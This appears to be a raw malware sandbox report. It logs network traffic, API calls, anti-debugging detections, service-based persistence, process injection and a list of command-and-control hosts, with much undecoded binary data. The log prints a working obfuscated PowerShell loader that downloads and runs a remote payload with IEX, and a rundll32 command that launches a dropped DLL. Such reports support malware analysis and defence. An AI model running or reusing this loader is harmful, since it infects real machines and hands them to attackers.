p) áS$ìÙJŒ?‰£aQÞ¬‡”ôcqì.âo[˜á‰\4ylvï;byæÛ¤š/&ÅÐáÞÙŽû·÷¨÷Ç嘏6•çâ7– 6užûr±›¼ùI؁Ý´*ÖAé¬v• ØßÕ½5/(lҘÁ¨ dwnG7ºÎ¬Y^hr։ÅA)>Y>Ý&õ$ɧZ£L@F¡™µ§:Qn†;ž}r§xYí>Qx Ð/²>{JKsüÆêàP|C“t³ÊtçŽÐ0Ô[q6´ºÁ00\H·‚;˜¦}`Š¢£)‚̺½ƒ¢ƒA¡Öñ¶ð¨|†;F¨H*ˆÜvšv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpˆ­Næً:ÆÝ'Qnÿ¼dõ3CO£‚F0‚B0Uÿ0ÿ0Uÿ0K+?0=0;+0†/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0€ħ±¤{,qúÛáKuÿÄ`…‰0TU M0K0g 0? +‚ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -†+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäs€ˆÈXöé›n0  *†H†÷  ‚ sl–nÿRЮ݌çZ­/¨ã¿É PÂålB»o›ô´OÂDˆuÌë›bnxÞì'º9\õ¢¡nV”pS±»ä¯Ð¢Ã+ԖôÅ 53ùØa6àq´¸µª‚E•Àò©#(çÖ¡ËgÚ C,ª“ÉÞõ«i]õ[†X"ÊMUäpgmÂWÅF9AϊXƒXm™þWè6ð#ªýˆ—Ðã\”Iµµ5Ò.¿N…ïà…’ë;l)# `ÜEL;éûÞÜDøX˜®ê½EE¡ˆ]fÊþéo‚ÈB ûéìã†Þã8ú¤}±ØèI‚„›+èkO 8w.ùÝç9
Data received ~\מ´¸ña³e˜ƒ1v.ÚøÅ1ҍÝ8||°s–­&àÄ¡…t0€JÁ
Data received ies.css?ver=13.4' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='http://sarvaero.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.3' media='all' /> <link rel='stylesheet' id='rs-plugin-settings-css' href='http://sarvaero.com/wp-content/plugins/revslider/public/assets/css/rs6.css?ver=6.2.23' media='all' /> <style id='rs-plugin-settings-inline-css'> #rs-demo-id {} </style> <link rel='stylesheet' id='joinchat-css' href='http://sarvaero.com/wp-content/plugins/creame-whatsapp-me/public/css/joinchat.min.css?ver=4.1.15' media='all' /> <style id='joinchat-inline-css'> .joinchat{ --red:37; --green:211; --blue:102; } </style> <link rel='stylesheet' id='punte-fonts-css' href='https://fonts.googleapis.com/css?family=Roboto%3A400%2C400i%2C700%2C700i%26display%3Dswap%7COpen%2BSans%3A400%2C400i%2C700%2C700i%26display%3Dswap&#038;subset=latin%2Clatin-ext&#038;ver=1.0' media='all' /> <link rel='stylesheet' id='punte-headers-css' href='http://sarvaero.com/wp-content/themes/punte/a
Data received ssets/css/headers.css?ver=1.0' media='all' /> <link rel='stylesheet' id='punte-footers-css' href='http://sarvaero.com/wp-content/themes/punte/assets/css/footers.css?ver=1.0' media='all' /> <link rel='stylesheet' id='punte-main-css' href='http://sarvaero.com/wp-content/themes/punte/assets/css/main.css?ver=1.0' media='all' /> <link rel='stylesheet' id='punte-style-css' href='http://sarvaero.com/wp-content/themes/punte/style.css?ver=5.8.3' media='all' /> <style id='punte-style-inline-css'> body{background-color:#FFFFFF} .punte-container{width:1280px} .header-layout1 .site-branding img,.header-layout5 .site-branding img,.header-layout6 .site-branding img{max-height:70px} .header-layout6 .is-sticky .site-branding img{max-height:50px} .header-layout1 .top-header,.header-layout3 .top-header,.header-layout5 .main-header,ul.punte-main-menu ul,.video-controls,.bttn-style1 a,.bttn-style3 a,.bttn-style5 a,.style3.punte-pricing-table,.style4.punte-pricing-table .ppt-header,.style4.punte-pricing-table .ppt-header:before
Data received ,.style4.punte-pricing-table .ppt-header:after,.style5.punte-pricing-table .ppt-header,.style5.punte-pricing-table .ppt-icon,.style5.punte-pricing-table .ppt-footer a,.style6.punte-pricing-table .ppt-footer a,.style6.punte-pricing-table .ppt-price,.style1.punte-team .pt-social-icons a,.style2.punte-team .pt-social-icons a,.style3.punte-team .pt-social-icons a,.style4.punte-team .pt-social-icons a,.style3.punte-testimonial .ptl-header,.pagination .page-numbers,.blog-style3 .entry-readmore a:hover,#pune-back-top,.sidebar-style3 .widget-title span:after,button,input[type="button"],input[type="reset"],input[type="submit"],.pws1-catname-wrapper a,.pws1-catname-wrapper a:before,.pnt-list .owl-theme .owl-nav [class*=owl-]:hover,.punte-portfolio-labels li.is-checked:after,.pnt-title,.style6.punte-pricing-table .ppt-heading:after,.pbp-pagination .page-numbers.current,.pbp-pagination a.page-numbers:hover,.punte-blog-post.style3 .punte-blog-list-inner,.punte-blog-post.style3 .punte-blog-list.pbp-even .punte-blog-list-in
Data received ner:before,.punte-blog-post.style3 .punte-blog-list.pbp-odd .punte-blog-list-inner:before,.punte-blog-post.style3 .pbp-line,.pbs-slide-caption .pbs-category a,.pbs-slider-wrap .owl-dots .owl-dot.active span,.pbs-slider-wrap .owl-dots .owl-dot:hover span,.punte-pricing-table.style2 .ppt-heading,.punte-pricing-table.style2:hover .ppt-icon,.style3.punte-pricing-table.punte-pricing-table,.style4.punte-pricing-table .ppt-button,.style5.punte-pricing-table .ppt-heading,.style5.punte-pricing-table .ppt-heading::before,.style5.punte-pricing-table .ppt-heading::after,.style1.punte-pricing-table .ppt-button,.punte-counter.style3 .pc-icon,.pbg-category a,.pbs-slide-caption .pbs-category a,.pwtb-catname-wrapper a.pwtb-active,.pwtb-catname-wrapper a:hover,.menu-item-punte-cart .mCSB_scrollTools .mCSB_dragger .mCSB_dragger_bar,.blog-style1 .entry-readmore a,blockquote:before{background-color:#308ac8} ul.punte-main-menu>li>a:hover svg{fill:#308ac8} .style1.punte-pricing-table .ppt-header{background-color:#3497dc} .style1.pu
Data received nte-pricing-table .ppt-button,.style4.punte-pricing-table .ppt-button,.style5.punte-pricing-table .ppt-heading,.style5.punte-pricing-tab
Data received
Data received 1
Data received f
Data received 8
Data received
Data received
Data received le .ppt-heading:before,.style5.punte-pricing-table .ppt-heading:after,.style6.punte-pricing-table .ppt-heading:after,#pune-back-top:hover,button:hover,input[type="button"]:hover,input[type="reset"]:hover,input[type="submit"]:hover,.pws1-catname-wrapper a.p-active,.pws1-catname-wrapper a.p-active:before,.pws1-catname-wrapper a:hover,.pws1-catname-wrapper a:hover:before,.bttn-style1 a:hover{background-color:#2b7cb4} a,.bttn-style2 a,.bttn-style6 a,.style3.punte-pricing-table .ppt-icon,.style6.punte-pricing-table .ppt-icon,.punte-blog-post .cat-links a:hover,.blog-style1 .entry-share a:hover,.blog-style3 .entry-share a:hover,.blog-style4 .entry-share a:hover,.punte-blog-post .entry-header a:hover,.comment-list a:hover,.post-navigation a:hover,.punte-related-post-wrap h4 a:hover,.punte-news-ticker h4 a:hover,.punte-blog-block h4 a:hover,.pbp-pagination .page-numbers,.punte-pricing-table.style2 .ppt-button:hover,.punte-counter.style3 .pc-value,.blog-style1 .entry-readmore a:hover,.blog-style1 .entry-readmore a:foc
Data received us{color:#308ac8} a:hover,.woocommerce .product_meta a:hover{color:#2b7cb4} .bttn-style2.punte-pricing-table a,.bttn-style6.punte-pricing-table a,.style6.punte-pricing-table,.blog-style1 .entry-readmore a:hover,.blog-style3 .entry-readmore a:hover,.sidebar-style2 .widget-title,.sidebar-style5 .widget,.sidebar-style4 .widget-title,.punte-blog-header,.pbp-pagination .page-numbers,.style1.punte-blockquote,.style2.punte-blockquote,.punte-pricing-table.style2:hover .ppt-header,.punte-pricing-table.style2 .ppt-button:hover,.punte-counter.style3,.pbg-category a,.pbs-slide-caption .pbs-category a,.pwtb-catname-wrapper a,.blog-style1 .entry-readmore a{border-color:#308ac8} .style1.punte-pricing-table .ppt-header:after{border-color:#308ac8 #308ac8 transparent transparent} .style1.punte-pricing-table .ppt-header:before{border-color:transparent transparent #308ac8 #308ac8} .style2 .ppt-header:before{border-color:transparent #308ac8 #308ac8 transparent} .style3 .pnt-title span,.punte-blog-post.style3 .punte-blog-list.pbp-
Data received even .punte-blog-list-inner:after,.blog-style1.sticky{border-left-color:#308ac8 } .punte-blog-post.style3 .punte-blog-list.pbp-odd .punte-blog-list-inner:after{border-right-color:#308ac8 } .style6.punte-pricing-table .ppt-price{box-shadow:0 0 0 5px #FFF,0 0 0 7px #308ac8} .punte-blog-post.style3 .punte-blog-list.pbp-odd .punte-blog-list-inner:before,.punte-blog-post.style3 .punte-blog-list.pbp-even .punte-blog-list-inner:before{box-shadow:0 0px 0px 3px #3497dc} .header-layout1 .main-header,.header-layout1 .site-branding,.header-layout5 .main-header,.header-layout5 .site-branding,.header-layout6 .main-header,.header-layout6 .site-branding{height:90px} .header-layout6 .is-sticky .main-header,.header-layout6 .is-sticky .site-branding{height:70px} .header-layout1 ul.punte-main-menu > li > a,.header-layout1 ul.punte-main-menu > li.header-search i,.header-layout5 ul.punte-main-menu > li > a,.header-layout5 ul.punte-main-menu > li.header-search i,.header-layout6 ul.punte-main-menu > li > a,.header-layout6 ul.punte-m
Data received ain-menu > li.header-search i{line-height:90px} .header-layout6 .is-sticky ul.punte-main-menu > li > a,.header-layout6 .is-sticky ul.punte-main-menu > li.header-search i{line-height:70px} .header-layout5 .top-header{padding-bottom:55px !important} .header-layout5 .top-header + .main-header-wrap,.header-layout5 .top-header + .main-header-wrap + .punte-mobile-header{margin-top:-45px} .header-layout5 + #content{transform:translateY(-45px);-webkit-transform:translateY(-45px);-ms-transform:translateY(-45px);margin-bottom:-45px} .header-layout5 + #content .page-header .page-title-wrap{margin-top:45px} .header-layout5 + .site-content > .punte-container:first-child{margin-top:85px} .site-header .site-branding{padding-top:10px;padding-right:10px;padding-bottom:10px;padding-left:0} .punte-main-menu{font-family:'Open Sans';font-size:16px;font-weight:400;font-style:normal;text-transform:uppercase;letter-spacing:} .punte-main-menu a{color:#ffffff;font-weight:400;font-style:normal} #primary{width:70%} .sidebar{width:27%} #
Data received colophon{background-color:#23242f;color:#EEEEEE;font-size:14px} .site-footer a{color:#CCCCCC} .site-footer a:hover{color:#AAAAAA} #bottom-footer .punte-container{background:#1f202a} ul.punte-main-menu > li > a,.header-layout4 .header-search-wrapper .search-field,.header-layout4
Data received .header-search-wrapper .search-field,.header-layout4 .header-search-wrapper .search-field,.header-layout4 .header-search-wrapper .search-field{color:#ffffff} .header-layout4 .header-search-wrapper .search-field::-webkit-input-placeholder,.header-layout4 .header-search-wrapper .search-field::-moz-placeholder,.header-layout4 .header-search-wrapper .search-field:-ms-input-placeholder,.header-layout4 .header-search-wrapper .search-field:-moz-placeholder{color:#ffffff;opacity:1} ul.punte-main-menu > li > a:hover,.home .punte-transparent-header ul.punte-main-menu > li > a:hover{color:#1e73be} nav.main-navigation ul.punte-main-menu > li.menu-item-has-children > a:hover:after,.home .punte-transparent-header ul.punte-main-menu > li.menu-item-has-children > a:hover:after{border-color:#1e73be} ul.punte-main-menu ul{background:rgba(37,188,234,0.8)} ul.punte-main-menu ul li a{color:#2e3434} ul.punte-main-menu ul li a:hover{color:#1e73be} .main-header,.header-layout5 .main-header,.punte-mobile-header{background:rgba(46,52
Data received ,52,0.6)} .header-layout1 .site-branding,.header-layout1 .main-header,.header-layout2 .main-header,.header-layout3 .main-header,.header-layout1 .menu-item-search,.header-layout2 .site-branding,.header-layout2 .top-header,.header-layout3 .main-navigation,.header-layout2,.punte-mobile-header{border-color:#292e2e} .site-header .top-header{padding-top:10px;padding-bottom:10px;color:#FFFFFF} .site-header .top-header,.top-menu ul{background:rgba(37,188,234,1)} .site-header .top-header a{color:#FAFAFA} .site-header .top-header a:hover{color:#EEEEEE} .punte-custom-footer{color:#ffffff}.punte-custom-footer a{color:#ffffff}.punte-custom-footer a:hover{color:#25bcea} @media screen and (max-width:768px){.main-header,.main-header-wrap,.menu-item-search{display:none !important} .punte-mobile-header{display:block !important} .header-layout4{position:relative;width:auto;max-width:none;box-shadow:none} .header-layout4 + .site-content,.header-layout4 + .site-content + footer{margin-left:0}} @media screen and (max-width:1320px)
Data received {#page,.punte-container{width:100%} .punte-container{padding:0 5%}} @media screen and (max-width:1320px){.both-sidebar .site-content > .punte-container,.both-left-sidebar .site-content > .punte-container,.both-right-sidebar .site-content > .punte-container{padding:0 5%} .both-sidebar #primary,.both-left-sidebar #primary,.both-right-sidebar #primary{float:none} .both-sidebar .sidebar-left,.both-left-sidebar .sidebar-left,.both-right-sidebar .sidebar-left{width:48%;margin:0;float:left} .both-sidebar .sidebar-right,.both-left-sidebar .sidebar-right,.both-right-sidebar .sidebar-right{width:48%;margin:0;right:0;float:right}} </style> <link rel='stylesheet' id='punte-responsive-css' href='http://sarvaero.com/wp-content/themes/punte/assets/css/responsive.css?ver=1.0' media='all' /> <link rel="preload" as="style" href="https://fonts.googleapis.com/css?family=Open%20Sans:400&#038;subset=latin&#038;display=swap&#038;ver=1624512099" /><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open%20Sans:400&
Data received #038;subset=latin&#038;display=swap&#038;ver=1624512099" media="print" onload="this.media='all'"><noscript><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open%20Sans:400&#038;subset=latin&#038;display=swap&#038;ver=1624512099" /></noscript><script src='http://sarvaero.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script> <script src='http://sarvaero.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script> <script src='http://sarvaero.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.2.23' id='tp-tools-js'></script> <script src='http://sarvaero.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.2.23' id='revmin
Data received -js'></script> <link rel="https://api.w.org/" href="http://sarvaero.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://sarvaero.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://sarvaero.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.8.3" /> <meta name="framework" content="Redux 4.3.5" /><style>.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <style type="text/css"> .site-title a, .site-description { position: absolute; clip: rect(1px, 1px, 1px, 1px); } </style> <meta name="generator" content="Powered by Slider Revolution 6.2.23 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <link rel="icon" href="http://sarvaero.com/wp-content/uploads/2021/06/cropped-SARV_Aero_up-1-32x32.png" sizes="32x32" /> <link rel="icon" href="http://sarvaero.com/wp-content/uploads/2021/0
Data received 6/cropped-SARV_Aero_up-1-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="http://sarvaero.com/wp-content/uploads/2021/06/cropped-SARV_Aero_up-1-180x180.png" /> <meta name="msapplication-TileImage" content="http://sarvaero.com/wp-content/uploads/2021/06/cropped-SARV_Aero_up-1-270x270.png" /> <script type="text/javascript">function setREVStartSize(e){ //window.requestAnimationFrame(function() { window.RSIW = window.RSIW===undefined ? window.innerWidth : window.RSIW; window.RSIH = window.RSIH===undefined ? window.innerHeight : window.RSIH; try { var pw = document.getElementById(e.c).parentNode.offsetWidth, newh; pw = pw===0 || isNaN(pw) ? window.RSIW : pw; e.tabw = e.tabw===undefined ? 0 : parseInt(e.tabw); e.thumbw = e.thumbw===undefined ? 0 : parseInt(e.thumbw); e.tabh = e.tabh===undefined ? 0 : parseInt(e.tabh); e.thumbh = e.thumbh===undefined ? 0 : parseInt(e.thumbh); e.tabhide = e.tabhide===undefined ? 0 : p
Data received arseInt(e.tabhide); e.thumbhide = e.thumbhide===undefined ? 0 : parseInt(e.thumbhide); e.mh = e.mh===undefined || e.mh=="" || e.mh==="auto" ? 0 : parseInt(e.mh,0); if(e.layout==="fullscreen" || e.l==="fullscreen") newh = Math.max(e.mh,window.RSIH); else{ e.gw = Array.isArray(e.gw) ? e.gw : [e.gw]; for (var i in e.rl) if (e.gw[i]===undefined || e.gw[i]===0) e.gw[i] = e.gw[i-1]; e.gh = e.el===undefined || e.el==="" || (Array.isArray(e.el) && e.el.length==0)? e.gh : e.el; e.gh = Array.isArray(e.gh) ? e.gh : [e.gh]; for (var i in e.rl) if (e.gh[i]===undefined || e.gh[i]===0) e.gh[i] = e.gh[i-1]; var nl = new Array(e.rl.length), ix = 0, sl; e.tabw = e.tabhide>=pw ? 0 : e.tabw; e.thumbw = e.thumbhide>=pw ? 0 : e.thumbw; e.tabh = e.tabhide>=pw ? 0 : e.tabh; e.thumbh = e.thumbhide>=pw ? 0 : e.thumbh; for (var i in e.rl) nl[i] = e.rl[i]<window.
Data sent GET /ve/ve.png HTTP/1.1 Host: 185.7.214.7 Connection: Keep-Alive
Data sent vraçx(ZBlŒŸ´£”Í´hLK¤Äwv§ÔÖ%r /5 ÀÀÀ À 281ÿsoomaal.softuvo.xyz  
Data sent FBAYxX 6ÿ6R@;Gró“e kä_+õ¶Þ-d@̘"êìS{؛BSȽ!ál@‚ÌÅvÑ­®—}›drî4‚l0€ƒ®4î®cÑõ!]MQ—ý¶æëÿ¡ ’çûèT8xÍ [º¯~ c¨úÎA
Data sent GET /assets/W8jp7/ HTTP/1.1 Host: ippur.ufrj.br Connection: Keep-Alive
Data sent plaçx2-=EñC€Ý¯‡A剏»¼‡2êR ú¥Î/5 ÀÀÀ À 28+ÿ ippur.ufrj.br  
Data sent plaçx3Dq|C ö>l1O9Öf×iø×6ÝƼ¯¾/5 ÀÀÀ À 28+ÿ ippur.ufrj.br  
Data sent lhaçx4KšwÀu+‹›PÜwÃdÈ¢ÿ—™>ë̆¸pú²/5 ÀÀÀ À 28'ÿ scoute.ai  
Data sent FBA󆖮劤u½÷*5B• ÷L¯šÆW­fZx/ðKšL·®(îÑÝ4ì¸L5= Û´ëj¥J’ÑoébÑRÇ}0ÂAÊñÞoÏorÔ3~ªÁFþî¡<¤ZšˆåLegD„’ÁÖ'¬IVÃ3m]
Data sent |xaçx4,+ðÐ \ø«ž±ÎûÃjã¬n€s44‰Ãöa/5 ÀÀÀ À 287ÿwordpress.pixeleyenow.com  
Data sent 0í¹ôtIÜ$öK>³"4 mÁ”\N y¼½$£L”Rë †Âr˜­^mo,Ž0ËH$¢|¸JÙÄ´½°H`\¼8Žß¤Š”dåág¤ÄY«ëzSnfMÔÑæèJìpŠÒ&)»˜iÒ¨ªŽ4 ªÕVDÁpF0%9Õaµ"ì~×àrý**z†ùN§šê”ß*&šýóNä,p‚B°qGë¤çHƒ92>˜oÙ¼9§  ÷<Ê9Ì>ªi6lôfǘ¼%=LJv[¶C?¿-`)1ô¸ûßvp·vQ6›|sÊr˜AVØu3cT¸É8â’“þÛ¦·áùMH¨³Û]0ë‹o®‚×:R“Gæõç"Fx÷ОYÄgìŸ onû^®ô„ï6áî<>D\c¸
Data sent GET /assets/BRrGH0HSkc/ HTTP/1.1 Host: sarvaero.com Connection: Keep-Alive
Data sent GET /wp-admin/mDk/ HTTP/1.1 Host: atplengineering.com Connection: Keep-Alive
Data sent GET /-/gkUMZLMfkddmFdMlJ/ HTTP/1.1 Host: www2.s12.xrea.com Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
process rundll32.exe
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2336 CREDAT:145409
host 103.8.26.102
host 103.8.26.103
host 104.168.155.129
host 117.18.232.200
host 131.100.24.231
host 178.63.25.185
host 178.79.147.66
host 185.7.214.7
host 192.254.71.210
host 203.114.109.124
host 207.38.84.195
host 209.59.138.75
host 212.237.17.99
host 217.182.143.207
host 45.118.115.99
host 45.142.114.231
host 45.176.232.124
host 46.55.222.11
host 51.38.71.0
host 51.68.175.8
host 58.227.42.236
host 79.172.212.216
service_name mwvuijgsfryxorv.pgq service_path C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq",qDAlUNWiucEQgv
Time & API Arguments Status Return Repeated

CreateServiceW

 service_start_name:
start_type: 2
password:
display_name: mwvuijgsfryxorv.pgq
filepath: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq",qDAlUNWiucEQgv
service_name: mwvuijgsfryxorv.pgq
filepath_r: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq",qDAlUNWiucEQgv
desired_access: 2
service_handle: 0x00570468
error_control: 0
service_type: 16
service_manager_handle: 0x00570328
1 5702760 0
parent_process iexplore.exe martian_process powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Time & API Arguments Status Return Repeated

send

 buffer: GET /ve/ve.png HTTP/1.1 Host: 185.7.214.7 Connection: Keep-Alive
socket: 1196
sent: 70
1 70 0

send

 buffer: vraçx(ZBlŒŸ´£”Í´hLK¤Äwv§ÔÖ%r /5 ÀÀÀ À 281ÿsoomaal.softuvo.xyz  
socket: 1220
sent: 123
1 123 0

send

 buffer: FBAYxX 6ÿ6R@;Gró“e kä_+õ¶Þ-d@̘"êìS{؛BSȽ!ál@‚ÌÅvÑ­®—}›drî4‚l0€ƒ®4î®cÑõ!]MQ—ý¶æëÿ¡ ’çûèT8xÍ [º¯~ c¨úÎA
socket: 1220
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1788
0 0

send

 buffer: GET /assets/W8jp7/ HTTP/1.1 Host: ippur.ufrj.br Connection: Keep-Alive
socket: 1764
sent: 76
1 76 0

send

 buffer: plaçx2-=EñC€Ý¯‡A剏»¼‡2êR ú¥Î/5 ÀÀÀ À 28+ÿ ippur.ufrj.br  
socket: 1796
sent: 117
1 117 0

send

 buffer: plaçx3Dq|C ö>l1O9Öf×iø×6ÝƼ¯¾/5 ÀÀÀ À 28+ÿ ippur.ufrj.br  
socket: 1796
sent: 117
1 117 0

send

 buffer: lhaçx4KšwÀu+‹›PÜwÃdÈ¢ÿ—™>ë̆¸pú²/5 ÀÀÀ À 28'ÿ scoute.ai  
socket: 1796
sent: 113
1 113 0

send

 buffer: FBA󆖮劤u½÷*5B• ÷L¯šÆW­fZx/ðKšL·®(îÑÝ4ì¸L5= Û´ëj¥J’ÑoébÑRÇ}0ÂAÊñÞoÏorÔ3~ªÁFþî¡<¤ZšˆåLegD„’ÁÖ'¬IVÃ3m]
socket: 1796
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1788
0 0

send

 buffer: |xaçx4,+ðÐ \ø«ž±ÎûÃjã¬n€s44‰Ãöa/5 ÀÀÀ À 287ÿwordpress.pixeleyenow.com  
socket: 1796
sent: 129
1 129 0

send

 buffer: 0í¹ôtIÜ$öK>³"4 mÁ”\N y¼½$£L”Rë †Âr˜­^mo,Ž0ËH$¢|¸JÙÄ´½°H`\¼8Žß¤Š”dåág¤ÄY«ëzSnfMÔÑæèJìpŠÒ&)»˜iÒ¨ªŽ4 ªÕVDÁpF0%9Õaµ"ì~×àrý**z†ùN§šê”ß*&šýóNä,p‚B°qGë¤çHƒ92>˜oÙ¼9§  ÷<Ê9Ì>ªi6lôfǘ¼%=LJv[¶C?¿-`)1ô¸ûßvp·vQ6›|sÊr˜AVØu3cT¸É8â’“þÛ¦·áùMH¨³Û]0ë‹o®‚×:R“Gæõç"Fx÷ОYÄgìŸ onû^®ô„ï6áî<>D\c¸
socket: 1796
sent: 326
1 326 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 1788
0 0

send

 buffer: GET /assets/BRrGH0HSkc/ HTTP/1.1 Host: sarvaero.com Connection: Keep-Alive
socket: 1796
sent: 80
1 80 0

send

 buffer: GET /wp-admin/mDk/ HTTP/1.1 Host: atplengineering.com Connection: Keep-Alive
socket: 472
sent: 82
1 82 0

send

 buffer: GET /-/gkUMZLMfkddmFdMlJ/ HTTP/1.1 Host: www2.s12.xrea.com Connection: Keep-Alive
socket: 480
sent: 87
1 87 0
parent_process iexplore.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
parent_process iexplore.exe martian_process powershell -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/ve/ve.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
parent_process powershell.exe martian_process "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll AnyString
file C:\Windows\SysWOW64\Uswzujvhdnzp\mwvuijgsfryxorv.pgq:Zone.Identifier
Process injection Process 2336 resumed a thread in remote process 2456
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000000000000368
suspend_count: 1
process_identifier: 2456
1 0 0
file C:\Users\Public\Documents\ssd.dll
file C:\Windows\System32\cmd.exe
dead_host 192.168.56.103:49235
dead_host 192.168.56.103:49212
dead_host 192.168.56.103:49217
dead_host 192.168.56.103:49236
dead_host 45.142.114.231:8080
dead_host 203.114.109.124:443
dead_host 178.63.25.185:443
dead_host 192.168.56.103:49233
dead_host 207.38.84.195:8080
dead_host 192.168.56.103:49226
dead_host 192.254.71.210:443
dead_host 192.168.56.103:49211
dead_host 217.182.143.207:443
dead_host 178.79.147.66:8080
dead_host 192.168.56.103:49210
dead_host 45.176.232.124:443
dead_host 58.227.42.236:80
dead_host 212.237.17.99:8080
dead_host 192.168.56.103:49227
dead_host 79.172.212.216:8080
dead_host 192.168.56.103:49228